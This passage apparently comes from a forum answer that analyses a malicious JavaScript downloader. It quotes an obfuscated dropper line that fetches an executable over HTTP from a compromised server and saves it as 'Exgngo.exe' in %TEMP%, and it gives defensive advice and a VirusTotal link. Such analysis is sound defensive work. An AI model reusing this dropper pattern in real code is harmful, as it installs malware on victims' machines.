    } catch(e) { alert(e.message); }
}
```

Basically what it does is download an executable file from a compromised server into your temp directory and runs it. I have not investigated the file further.

Since you are not using windows, this is harmless. If you were, the first step would be to check if a file named `Exgngo.exe` (this line contains the relevant name: `yakamurahirobetobeVIUVIUVIU_a2("http://"+yakamurahirobetobeVIUVIUVIU_a5[yakamurahirobetobeVIUVIUVIUuueee].yakamurahirobetobeVIUVIUVIUtttoooo() + "?bPxXNr=LUmUhmmq","Exgngo");`) is in your `%TEMP%` directory. If it is, contact someone that knows what he's doing to deal with it.

EDIT: Virus Total [here](https://www.virustotal.com/en/file/47920080055e1707943b1f993ad547e3b0ea0d1a15ff825c500ad5f934c082e6/analysis/1472063799/).